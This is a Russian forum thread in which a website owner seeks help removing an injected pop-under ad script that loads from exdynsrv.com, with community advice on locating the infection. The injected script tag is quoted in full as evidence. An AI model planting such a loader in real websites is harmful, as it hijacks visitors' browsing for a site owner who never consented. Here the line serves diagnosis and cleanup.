Видимо где-то внедрили вредоносный код на главной странице, открывается второе окно со ссылкой на левый сайт syndication.exdynsrv.com
Нужно найти вредоносный код и удалить.
Напрямую вредоносного кода не видно где он, а в Гугл Хроме по ссылке "просмотреть код", виден следующий код:
<body><script type="text/javascript" async="" src="//a.exdynsrv.com/popunder1000.js" id="popmagicldr" data-exo-idzone="1624818" data-exo-frequency_period="5" data-exo-frequency_count="1" data-exo-trigger_method="1" data-exo-trigger_class="" data-exo-popup_force="false" data-exo-popup_fallback="true" data-exo-new_tab="false" data-exo-cat="" data-exo-tags="" data-exo-el="" data-exo-sub="" data-exo-sub2="" data-exo-sub3=""></script>
по видимому этот скрипт подставляется после тега body.
Ищу кто в этом разбирается и поможет за оплату найти и удалить вредоносный код.
Скачайте все файлы сайта себе на комп и пройдитесь антивирусом.
Если ничего не найдено — поищите в файлах сайта поиском по тексту такой текст: ob_start()
revisium.com/ai/
Конечно способ Ris, более надежный, но как вариант...
ЗЫ: Прежде всего, да, надо снять дамп с сайта и желательно поднять копию на локальном. И на ней уже делать поиск (имея в запасе не тронутый бекап), что бы случайно не удалить ничего лишнего…
В файлах сайта около 70 таких функций ob_start(), но ничего там не увидел сомнительного.
Скачал все файлы сайта себе на комп и прошелся антивирусом, Касперский ничего не нашел.
В файлах сайта около 70 таких функций ob_start(), но ничего там не увидел сомнительного.
По всей видимости заражён не Ваш сайт, а ваш компьютер, почитайте тут пути решения. AdwCleaner вам в помощь.
В дефолтном движке 1.10.7 39 файлов с текстом ob_start()В файлах сайта около 70 таких функций ob_start(), но ничего там не увидел сомнительного.
То есть 30 явно посторонние.
Для нас интерес представляют файлы, где после <?php ob_start();?> следуют нечитаемые крякозябры.
По всей видимости заражён не Ваш сайт, а ваш компьютер
Хм… к слову...
Позавчера лечил свой роутер...
При открытии любых нормальных сайтов пропадал любой флэш и любая реклама (в том числе на yandex.ru)
А на некоторых наоборот реклама появлялась (порнуха)).
Причем происходило это на всех устройствах в доме (стационарник и два ноута).
Логически определился, что дело в роутере.
Пришлось сделать сброс на заводские настройки и ввести данные профилей заново...
Откуда там взялся вирус не понятно, антивирусы на всех устройствах хорошие… НО...
Как то так…
Андрей, не думаю что дело в компьютере, окно всплывает именно на этом сайте, на других сайтах этого всплывающего окна нет.
Тогда просто поищите в тексте файлов сайта popunder1000.js
И вообще, этот скрипт popunder1000.js где-то используется? Найдите этот файл и смените ему расширение с js на js_
И посмотрите, что перестанет работать.
classics,
Тогда просто поищите в тексте файлов сайта popunder1000.js
И вообще, этот скрипт popunder1000.js где-то используется? Найдите этот файл и смените ему расширение с js на js_
И посмотрите, что перестанет работать.
Этого файла у меня разумеется нет, он видимо где-то на левом сайте, на который ведет эта левая ссылка.
И в тексте в файлах сайта тоже текста "popunder1000" нет, видимо где-то зашифровано, но откуда ноги растут, увы, не знаю. Возможно в какие то скрипты засунули.
Так ищите текст exdynsrv.comЭтого файла у меня разумеется нет, он видимо где-то на левом сайте, на который ведет эта левая ссылка.
Андрей, не думаю что дело в компьютере, окно всплывает именно на этом сайте, на других сайтах этого всплывающего окна нет.
Вы прочитайте статью которую я вам скинул, Вы может ищите не там где надо искать.
Как правило вся дрянь прописывается в index.php сравнив с оригиналом. Если и там нет поищите поиском в базе данных.
по видимому этот скрипт подставляется после тега body.